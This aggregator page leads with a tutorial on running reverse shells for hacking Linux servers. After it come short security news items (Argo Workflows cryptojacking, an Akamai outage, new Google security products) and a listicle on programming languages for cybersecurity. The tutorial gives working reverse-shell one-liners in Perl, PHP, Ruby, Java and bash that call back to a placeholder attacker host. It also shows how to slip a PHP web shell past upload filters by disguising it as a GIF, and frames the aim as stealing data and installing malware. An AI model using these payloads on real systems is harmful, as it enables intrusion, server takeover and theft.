Connect with us

Cyber Security

How to Run Reverse Shell for Hacking in Linux

Published

on

image

Morpheuslord Hacker Noon profile picture

@morpheuslordMorpheuslord

I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.

A reverse shell is a hacking vulnerability in which the hacker executes .php codes or an executable file in which he gets access to the shell of the target system. Then he can install rats or steal any info regarding his banks or the info regarding the users of the websites and its services.

When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell with or without root access for further malicious activities such as a huge data breach, complete erase of the server, etc.

Prerequisites

To listen to a reverse shell in Linux, you need to have netcat installed. But in Windows, you need to have ncat which comes installed with nmap suite in order to run listening on Linux. And, in Windows you need to execute the following code to listen for reverse shell.

linux
nc –nlvp <port-used-by-u> windows
ncat.exe –nlvp <port-used-by-u>

Programming languages used

Literally, any programming language can be used from high level to low-level anyone can be used but the most common are:-

  • python
  • java
  • Perl
  • ruby
  • PHP
  • bash
python:

Python is a really fast-growing programming language and it has its involvement in every field starting from websites to desktop applications it is used in every place. so some times after enumeration if you find you can use python in the server you can use the code given below to start a reverse shell connection.

import socket SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
# send 1024 (1kb) a time (as buffer size)
BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
# separator string for sending 2 messages in one go
SEPARATOR = "<sep>" # create a socket object
s = socket.socket() # bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...") # accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!") # receiving the current working directory of the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print("[+] Current working directory:", cwd) while True: # get the command from prompt command = input(f"{cwd} $> ") if not command.strip(): # empty command continue # send the command to the client client_socket.send(command.encode()) if command.lower() == "exit": # if the command is exit, just break out of the loop break # retrieve command results output = client_socket.recv(BUFFER_SIZE).decode() print("output:", output) # split command output and current directory results, cwd = output.split(SEPARATOR) # print output print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
perl:

Perl just like Python is a programming language used in web development but comparatively more used than Python.

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer

php:

PHP is a server-side scripting language. that is used to develop Static websites or Dynamic websites or Web applications. PHP stands for Hypertext Pre-processor, which earlier stood for Personal Home Pages. PHP scripts can only be interpreted on a server that has PHP installed

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer

ruby:

Ruby and Python are both solid languages to use in web development. Ruby offers Ruby on Rails, which uses a Model-View-Controller (MVC) architecture. The MVC architecture is a convention to separate logic.

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

In the above code instead of 10.0.0.1, you can specify your ip and in the ( $p= ) you can specify the port you prefer

java:

Java developers keep up with developments in the coding language, perform periodic updates of security protocols, and excellent grasp to handle data requests.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer

bash:

Bash is not used in the website instead used in the Linux server itself and it to the most extent very effective

Bash : bash -i >& /dev/tcp/10.10.10.10/4443 0>&1

In the above code instead of 10.0.0.1, you can specify your ip and in the ( $p= ) you can specify the port you prefer

Shell codes copied directly from exploit-db

 website.

Problems while executing injecting reverse shell

The main problem is how to inject the code into the website. Some methods are by embodying the code into the metadata of a picture and then uploading the image into the website.

You can start a reverse shell attack but in some websites or mostly all secured websites divide the files uploaded into 2 types white tag and black tags. This means the metadata is enumerated and the upload is stopped or the websites might have a really powerful firewall or a malware detection mechanism that blocks anonymous web traffic and blocks it for good.

Overcome problems

To overcome the problems you need to have a lot of resources but it is very difficult to bypass the firewall until you don’t know the info required so we won’t include that in the article. But, there is a way to make the upload possible by adding a header in the metadata of the image. Usually, hackers use the PHP codes more than any code because of the versatility it provides and many times the code starts with .php format or header causing it to be detected and stopped so for this not to happen you need to add

GIPHY 

header to the metadata to do that you need to follow the following codes

#open vim and the photo file with the codes
vim example.png #enter the GIPHY header on the top of everything GIF89a;
<?php system($_GET[‘c’]);?> #save the above 
#u are ready to upload the picture into the website

The GIF89a; is the GIPHY header it tells the website that it is a legit picture but you might feel the code won’t work but it will work without any issue and you can listen to the shell and enumerate the server.

Source

The sources or his article are youtube videos and the codes are from various GitHub repos.

You can always find the owner of the source code for the program in

github.com

And

exploit-db websit

e

Note

To effectively enumerate the web shell you must execute the /bin/bash/sh/ to properly get the bash shell to try to get the sudo or root privileges. Install any malware or see any data in any look and corner of the whole system. This is a simple tool but very effective in enumerating the system.

Follow me

Follow my Twitter account for the latest updates

by Morpheuslord @morpheuslord. I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.Read my stories

Tags

Join Hacker Noon

Create your free account to unlock your custom reading experience.

PlatoAi. Web3 Reimagined. Data Intelligence Amplified.
Click here to access.

Source: https://hackernoon.com/how-to-run-reverse-shell-for-hacking-in-linux-of5i37ob?source=rss

Cyber Security

Threat Actors are Abusing Argo Workflows to Target Kubernetes

Published

on

According to a warning from security vendor Intezer, threat actors are leveraging Argo Workflows to target Kubernetes deployments and deploy crypto-miners.

The Intezer team discovered a number of unprotected instances run by companies in the IT, finance, and logistics industries that allowed anyone to deploy workflows. Malicious actors have used the nodes to deploy crypto-miners in some circumstances.

Argo Workflows is an open-source, Kubernetes-based workflow engine that allows customers to perform parallel operations from a single interface, minimising deployment complexity and reducing the risk of failures.

Argo works using YAML files to define the type of work to be done, with workflows being run either from a template or directly from the Argo console.

Threat actors might access an open Argo dashboard and deploy their workflow on the misconfigured servers, according to Intezer. The adversary used kannix/monero-miner, a known crypto-currency mining container that has been removed from Docker Hub, in one of the reported attacks.

Threat actors are abusing the container, which uses XMRig to mine for Monero and can be easily adjusted by simply altering the address of the crypto-wallet where the mined virtual coin should be deposited, to execute crypto-jacking activities.

Users can simply access the Argo Workflows dashboard from outside the corporate network, using an incognito browser, and without authentication, to see if their instances have been correctly configured.

“Another alternative is to query your instance’s API and look at the status code. Request information from [your.instance:port]/api/v1/info using HTTP GET. While an unauthenticated user, a returned HTTP status code of “401 Unauthorized” indicates a correctly configured instance, whereas a successful status code of “200 Success” could indicate that an unauthorised user is able to access the instance, according to Intezer.

Users should also verify their Argo instances for any strange behaviour and make sure that no workflows have been running for an extended period of time, since this could suggest the deployment of a crypto-miner in the cluster.


PlatoAi. Web3 Reimagined. Data Intelligence Amplified.
Click here to access.

Source: https://cybersguards.com/threat-actors-are-abusing-argo-workflows-to-target-kubernetes/

Continue Reading

Cyber Security

What Programming Language Should I Learn for CyberSecurity?

Published

on

What Programming Language Should I Learn for CyberSecurity?- There are approximately 250 popular computer programming languages in use today, with as many as 700 in use worldwide. That number drops to roughly 10-15 in cyberspace. Here are the top twelve programming languages for cyber security that you should learn before embarking on a new cyber job.

Table of Contents

The Best Programming Languages for Cybersecurity

Python

Python has been a dominating language in cyber security for numerous years. Because it’s a server-side scripting language, the final script doesn’t need to be compiled by programmers. It’s a general-purpose phrase that’s employed in a lot of cyber security situations, if not all of them.

Python allows you to automate processes and do malware analysis. Furthermore, a large third-party library of scripts is readily available, implying that assistance is just a click away. Some of the features that make it popular are code readability, straightforward and simple syntax, and a large variety of libraries.

Python is a crucial programming language for cyber security specialists since it can be used to identify malware, do penetration testing, scan for dangers, and analyse them. Being a SOC support expert makes a lot of sense if you know Python.

To safeguard web pages from security risks, you’ll need to create tools and scripts in this role. You can also use data, logs, and artefacts to investigate the source of the problems.

As a side aside, the graph above depicts the relative popularity of a language based on the number of GitHub pulls that language receives each year. This and the following charts are based on data from GitHut 2.0, which was generated by littleark.

Golang

Most malware is designed to enter target systems undetected, which makes Golang ideal for this.

A single source code can be written in Golang for all major operating systems.

The virus written in GoLang is quite huge. Because big files cannot be analysed by most antivirus software, this allows them to enter systems undetected.

This language also comes with a large set of libraries that make creating malware a breeze.

For security pros, Go has gained a lot of traction. Because of its application in server and cloud services, flexibility and ease of use, and data analysis capabilities, it’s an excellent choice for cyber programmers.

JavaScript

JavaScript is the most widely used programming language, with 95 percent of all websites using it.

It’s one of the most powerful programming languages for cyber security.

If you want to grab cookies, abuse event handlers, and perform cross-site scripting, JavaScript is the way to go.

JavaScript libraries include NodeJS, ReactJS, and jQuery.

This also indicates that, because to the language’s broad use, applications and systems that use it are prime targets.

JavaScript allows programmers to utilise any code while consumers are on a website, enhancing the usefulness of that site. On the other hand, it could provide dangerous functionality that the visitor is unaware of. Malicious coding could be used to start a programme if the website is hacked.

If you know JavaScript, you can make any website secure enough to prevent or even eliminate Cross-Site Scripting (XSS) assaults.

Front-end developers, full-stack developers, back-end developers, and others use JavaScript. It is both the most adaptable and the most widely spoken language on the planet.

C

Because cyber security experts can dismantle malware to investigate its design, propagation, and repercussions using C language in reverse engineering, it makes it easier to develop antivirus solutions.

For developers who QA code integrity, the C programming language is also necessary.

Before launching an attack, cyber adversaries may utilise the language to detect exploitable holes in the network.

Because it is a low-level programming language with basic syntax, it can be learned in a few months. When writing a programme, programmers go above and above to ensure that it is bug-free. Hackers, on the other hand, can utilise it to uncover flaws.

Lint is a code analysis tool for programmes written in the C programming language. Since its inception, other variations have arisen. Lint can be used by both cyber security specialists and hackers to uncover programming faults and defects that compromise computer network security.

C++

C++ is based on the C programming language, however it has a few differences.

C++, unlike C, supports objects and classes.

C++ is a quicker and more efficient programming language than C.

Despite its utility, it is used by less than 0.1 percent of all websites.

A C++ developer creates desktop and mobile apps, whereas coding experts find and fix problems and vulnerabilities.

Cyber security experts benefit from studying C++ since it allows them to quickly identify vulnerabilities and security flaws. Cyber professionals may quickly identify security issues in code using a scanning tool like Flawfinder, which searches C++. Using an integrated database that covers the language function’s probable hazards, these tools describe current vulnerabilities, their severity, and their effects on an application.

SQL

The SQL (Structured Query Language) programming language is a domain-specific language. It’s a common tool for parsing data in huge databases. SQL is the most used database management programming language as businesses become more data-driven.

Most websites, such as Relational Database Administration System, employ SQL for data management (RDBS).

It works with a variety of database systems.

As a result, it is widely regarded as the most user-friendly language for database management.

SQL queries are written by database administrators, programmers, and end users to retrieve, insert, modify, and delete data from database tables. This language is frequently used by attackers to steal confidential information, compromise data repositories, and carry out a variety of web-based attacks.

If you wish to understand the attacker’s activities and avoid SQL injection and other database-related assaults, you’ll need at least a rudimentary understanding of SQL.

Assembly

Any low-level language that aids in the analysis and understanding of malware is known as an assembly language.

Understanding assembly is simple, especially if you are already familiar with a high-level programming language.

Slammer, a trojan based on assembly, caused havoc and hindered web traffic in 2003 by inflicting service neglect on a large number of webmasters. The malware took advantage of a protection overflow flaw in Microsoft’s SQL server. Although the issue did not occur suddenly — several months before a patch was provided – several businesses failed to apply it, allowing the flaw to spread.

Assembly is an important programming language because it can be used by cyber security specialists to decipher malware and understand how it works. Cyber security workers are always defending against conventional and modern malware, therefore it’s critical to understand how malware works.

PowerShell

PowerShell is a more versatile command-line interface that combines the advantages of the traditional Command Prompt (CMD) with a powerful scripting environment that may be used to gain access to a machine’s inner core, including access to Windows APIs.

PowerShell is a useful tool for administrators to automate tedious processes, but its capabilities have unfortunately been exploited by malevolent actors.

Hackers can now use PowerShell to obtain sensitive domain information and load malicious executables instead of relying on traditional malware (also known as fileless malware).

Many attackers favour PowerShell since it is installed by default on all PCs from Windows 7 to Windows Server 2019.

Ruby

Ruby is a high-level programming language established and developed in Japan by Yukihiro Matsumoto. It has since grown in popularity to become one of the most widely used programming languages on the planet.

The syntax of Ruby is nearly identical to that of Perl and Python.

It was written in the C programming language.

It is popular among developers because of its ease of use and natural capacity to manage large code projects.

Airbnb, Hulu, Kickstarter, and Github are just a few of the sites that employ Ruby.

Ruby is a programming language that manages a lot of a machine’s complex information, making it easier to write programmes and using less code.

Java

Many important operating systems, such as Solaris, Linux, macOS, and Microsoft Windows, were designed using Java as one of the earliest languages. It is widely used in various industries because it powers both new and legacy web servers.

The Java programming language has numerous applications in the field of information security.

For example, cyber adversaries utilise it to reverse-engineer proprietary software programmes in order to find and exploit security flaws.

Penetration testers frequently use Java to organise the high-scaling servers that they utilise to deliver payloads.

Pen testing is an important part of a cyber security specialist’s job, and knowing Java makes it easier.

Java programming is used by experienced ethical hackers to construct and develop sophisticated, ethical programmes.

Java is popular among cyber specialists because it is more dynamic than languages like C++.

Ethical hackers can use Java to construct vulnerability testing applications that can run on a variety of systems.

PHP

PHP is a computer language that is used to create webpages on the server side. PHP is the most powerful server-side language available, with 80 percent of the top 10 million domains using it. For this reason alone, it is self-evident that knowing PHP will assist you in defending against attackers.

RIPS is a common tool for automated security analysis in PHP applications.

RIPS investigates data flow from input parameters to important operations in an application.

If you’re a PHP developer dealing with security flaws, RIPS could be useful.

You can write server-side web application logic as a PHP security developer.

PHP can be used to manage back-end resources and data sharing between servers and their customers.

You can also utilise your PHP skills to find and fix any flaws in your code.

It’s also worth noting that PHP is a server-side language that works with HTML and aids the proper functioning of websites. Web designers use PHP to connect databases to web pages to make website upgrades easier.

Shell scripting

Shell scripting combines numerous commands that you may already be familiar with through your operating system’s terminal sessions to allow developers to create automated scripts for a variety of tasks.

Do you need to set up accounts rapidly and provide enough access? Are you looking for a quick way to automate a system configuration security lockdown? Shell scripting is useful in this situation.

If you’re using Linux or macOS, you’ll want to learn certain Linux scripting languages like Bash. Immerse yourself in PowerShell if you’re a Windows expert.

What’s the First Cyber Security Language I Should Learn?

Python is a good place to start. The syntax is simple, and there are numerous libraries available to make your coding life easier.

Python is used in cyber security to do several tasks such as malware scanning and analysis. Python is also a good starting point for more advanced programming languages. It has a high level of web readability and is utilised by some of the world’s most well-known digital companies, including as Google, Reddit, and NASA. After you’ve mastered Python, you can progress to higher-level programming languages.


PlatoAi. Web3 Reimagined. Data Intelligence Amplified.
Click here to access.

Source: https://cybersguards.com/what-programming-language-should-i-learn-for-cybersecurity/

Continue Reading

Cyber Security

Software Update Triggered a Glitch at Network Specialty Firm Akamai

Published

on

A software update at network speciality provider Akamai caused a glitch on Thursday, knocking websites offline for a short time.

Reports of internet outages from around the world exploded on the website Downdetector, with Akamai, based in the United States, claiming that some websites were down for up to an hour.

“A flaw in the DNS (domain name system) system, which leads browsers to websites, was caused by a software configuration update,” Akamai noted in a blog post. “As a result, the availability of several client websites was impacted.”

According to Akamai, who apologised for the inconvenience, rolling back the software update fixed the problem.

The outage, which impacted banks, airlines, and other online services, occurred just weeks after Akamai was blamed for a massive online outage that impacted bank and airline websites on both sides of the Pacific.

Around 500 of Akamai’s clients were briefly taken offline due to a fault with one of its online security solutions at the time.

The occurrences highlight the importance of online platforms’ reliability, as well as the critical role that a few little-known “CDN” (content delivery network) providers play in keeping the web up and running.

After a malfunction with cloud computing services provider Fastly in June, US media and government websites, including the White House, New York Times, Reddit, and Amazon, were temporarily down.

Fastly is a service that reduces the time it takes for a webpage to load.


PlatoAi. Web3 Reimagined. Data Intelligence Amplified.
Click here to access.

Source: https://cybersguards.com/software-update-triggered-a-glitch-at-network-specialty-firm-akamai/

Continue Reading

Cyber Security

Google Announced Autonomic Security Operations to Improve SOCs and IDS

Published

on

Google Cloud introduced new security products for its customers this week, including Autonomic Security Operations, which aims to improve security operations centres (SOCs), and Cloud Intrusion Detection System (IDS), which detects network-based threats.

According to Google, Autonomic Security Operations is a “stack of products, integrations, blueprints, technical documentation, and an accelerator programme” that aims to assist customers combine Chronicle and Google technology and experience to enhance their SOC.

Autonomic Security Operations is a combination of concepts, techniques, and tools that should assist organisations increase their resilience against cyberattacks by automating threat management.

Products (Chronicle, Looker, and BigQuery), integrations with supported vendors (EDR, SOAR), network forensics and telemetry blueprints, content (sample dashboards, rules, and use-cases), accelerator workshops, and preferred SOC transformation and managed security service provider (MSSP) partners are all included in the solution.

Google claims it has teamed up with BT to bring Autonomic Security Operations to the managed security services industry, and the solution is underpinned by long-standing partnerships with Cyderes and SADA Systems, among others.

Google’s new Cloud IDS, which is currently in preview, is a network security product that provides native network-based threat detection capabilities while leveraging Google Cloud integration.

The tool was developed in partnership with Palo Alto Networks and can assist enterprises in not just gaining insight into network-based risks, but also ensuring that their security systems are compatible with industry norms.

Cloud IDS is an end-to-end cloud solution that monitors east-west traffic as well as traffic to and from the Internet for anomalies and threats such as malware, spyware, command and control (C&C) activity, and more. Cloud IDS data may be used to examine and correlate threats, as well as respond to them.

Cloud IDS now works with Splunk’s cloud and enterprise platforms, Exabeam’s Advanced Analytics solution, The Devo Platform, and Palo Alto Networks’ Cortex XSOAR, with Google Cloud’s Chronicle and Security Command Center integrations coming soon.


PlatoAi. Web3 Reimagined. Data Intelligence Amplified.
Click here to access.

Source: https://cybersguards.com/google-announced-autonomic-security-operations-to-improve-socs-and-ids/

Continue Reading
AI59 mins ago

What is the Freedom Phone and Should You Buy It?

Esports1 hour ago

How to unlock Pokémon in Pokémon UNITE, all Unite License costs

Cleantech2 hours ago

Do Electric Vehicles Pollute As Much As Gas-Powered Ones?

Esports3 hours ago

Los Angeles Thieves stun OpTic Chicago, complete reverse sweep to cap Stage V group play

Esports3 hours ago

Best Greninja build in Pokémon UNITE

Big Data3 hours ago

Robinhood CEO says he is considering offering U.S. retirement accounts

Cleantech3 hours ago

Line 3 Oil Spilled Into The Willow River — Indigenous Water Protectors Need Our Help

Crowdfunding4 hours ago

Payments Fintech Banking Circle Chooses European Firm SIA to Provide Instant Payments

Cleantech4 hours ago

California Commits $10M To e-Bike Purchase Assistance, Other e-Bike Adoption Programs

Esports4 hours ago

Immortals introduce Evil Geniuses to the “League of Draven” with victory in week 8 of 2021 LCS Summer Split

AI4 hours ago

Nigeria to Launch a Pilot for Its CBDC in October

AI4 hours ago

Amazon Wants a Leader For Its Digital Currency and Blockchain Product Unit

AI4 hours ago

Fintech Giant Zip Co to Provide Cryptocurrency Trading Services

AI4 hours ago

Locked Out of Millions: Couple Can’t Access $5.8M Worth of Ethereum

AI4 hours ago

Blockchain Startups Raised over $4 Billion in VC Funding in Q2 2021

Esports4 hours ago

Minnesota RØKKR finish Stage 5 group play with dominant win over Florida Mutineers

Cleantech4 hours ago

We Cannot Short-Change Transit—Not Now

Crowdfunding4 hours ago

Cross-Border Payments Fintech Thunes Acquires Limonitek, a European Payment Service Platform

Esports5 hours ago

TSM defeat Golden Guardians in first fully online LCS game since April

Esports5 hours ago

World of Warcraft Burning Crusade Classic Arena Tournament scores and results

CNBC5 hours ago

WhatsApp says NSO spyware was used to attack officials working for US allies

Esports5 hours ago

Vivo Keyd wins second season of Brazilian Free Fire League (LBFF) 2021

Aviation5 hours ago

American Airlines set to operate two new routes from Miami

Esports5 hours ago

Who won Minecraft Championships (MCC) 15? | Final Standings and Scores

Esports6 hours ago

Best Garchomp build in Pokémon UNITE

Gaming6 hours ago

Coreupt for PC & Next-Gen Consoles Gets New Images Showing its Fighters; New Trailer Teased

Cleantech6 hours ago

How Tesla Can Massively Improve The Repair & Service Experience, Avoid Insane Repair Quotes

Esports6 hours ago

Elden Ring System Requirements: Can You Play It?

Esports6 hours ago

Pokémon GO Ultra Unlock Part 1 Research Task Rewards: Full List

Esports6 hours ago

Legends of Runeterra Sentinels of Light Missions and Rewards

Trending